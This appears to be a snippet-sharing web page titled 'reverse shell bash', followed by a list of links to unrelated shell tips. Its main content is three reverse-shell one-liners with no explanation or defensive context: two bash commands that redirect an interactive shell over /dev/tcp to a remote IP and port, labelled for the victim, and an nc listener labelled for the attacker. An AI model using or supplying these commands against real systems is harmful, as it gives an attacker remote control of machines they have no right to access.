Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

reverse shell bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Comment

how to reverse shell

/bin/bash -i > /dev/tcp/0.0.0.0/9000 0<&1 2>&1 # Victim
Comment

how to reverse shell

nc -l -p 9000 -vvv # Attacker
Comment

PREVIOUS NEXT
Code Example
Shell :: php /usr/local/bin/composer to composer 
Shell :: ubuntu install vboxguest 
Shell :: bashrc file location in linux 
Shell :: sveltekit normalize css 
Shell :: make git project mine 
Shell :: generating ssh key 
Shell :: install github linux 
Shell :: list all the emulator 
Shell :: add sudo user ubuntu 
Shell :: Port 80 in use by "Unable to open process" with PID 4! 
Shell :: ffmpeg rotate video 
Shell :: linux how to kill any process on port 
Shell :: how to unlock minimize button on gnome 
Shell :: java check jre version 
Shell :: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to github.com:443 
Shell :: how to push code to github 
Shell :: beautifulsoup download python 3 
Shell :: ubuntu command history 
Shell :: open port on linux 
Shell :: tmux how to kill all sessions 
Shell :: install composer alpine docker 
Shell :: hash sum mismatch ubuntu 
Shell :: installation of package ‘openssl’ had non-zero exit status 
Shell :: git remove all local changes 
Shell :: How to restart a service with systemctl command 
Shell :: clean up untagged docker images 
Shell :: scss in gatsby 
Shell :: how to update powershell version 
Shell :: ubuntu ufw add to autostart 
Shell :: how to install differnt version of temsorflow 
ADD CONTENT
Topic
Content
Source link
Name
1+1 =